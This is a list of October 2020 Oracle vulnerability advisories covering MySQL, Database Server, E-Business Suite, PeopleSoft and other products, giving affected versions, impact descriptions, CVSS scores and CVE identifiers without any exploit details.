oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: SQL Extensions). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14826
oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Oracle Diagnostics Interfaces). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 6.4 CVE-2020-14761
oracle — banking_corporate_lending Vulnerability in the Oracle Banking Corporate Lending product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Corporate Lending. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Corporate Lending accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14894
oracle — banking_payments Vulnerability in the Oracle Banking Payments product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 14.1.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Payments. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Payments accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14896
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14815
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N). 2020-10-21 5.5 CVE-2020-14766
oracle — core_rdbms Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYSDBA level account privilege with network access via Oracle Net to compromise Core RDBMS. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Core RDBMS accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 5.5 CVE-2020-14742
oracle — customer_relationship_management_technical_foundation Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3 – 12.2.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle CRM Technical Foundation accessible data as well as unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 5.5 CVE-2020-14823
oracle — database Vulnerability in the RDBMS Security component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having Analyze Any privilege with network access via Oracle Net to compromise RDBMS Security. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all RDBMS Security accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14901
oracle — database_filesystem Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14741
oracle — database_vault Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Create Public Synonym privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Database Vault accessible data as well as unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 6.5 CVE-2020-14736
oracle — e-business_suite_secure_enterprise_search Vulnerability in the Oracle E-Business Suite Secure Enterprise Search product of Oracle E-Business Suite (component: Search Integration Engine). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite Secure Enterprise Search. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle E-Business Suite Secure Enterprise Search accessible data as well as unauthorized access to critical data or complete access to all Oracle E-Business Suite Secure Enterprise Search accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 6.4 CVE-2020-14805
oracle — flexcube_universal_banking Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14887
oracle — graalvm Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14803
oracle — hospitality_suite Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Suite8 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14807
oracle — hospitality_suite8 Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data as well as unauthorized read access to a subset of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14810
oracle — hyperion_lifecycle_management Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 4.9 CVE-2020-14752
oracle — installed_base Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 4.3 CVE-2020-14822
oracle — java_virtual_machine Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 4.9 CVE-2020-14743
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14849
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14835
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14816
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14817
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14844
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14846
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14789
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14786
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14830
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14793
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14809
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14794
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14799
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14804
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14848
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14893
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14829
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14821
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 6.5 CVE-2020-14828
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14814
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 4 CVE-2020-14827
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14888
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14891
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14790
CONFIRM
MISC
oracle — one-to-one_fulfillment Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14819
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Grids). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14813
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.3 CVE-2020-14802
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.3 CVE-2020-14801
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 4.3 CVE-2020-14795
MISC
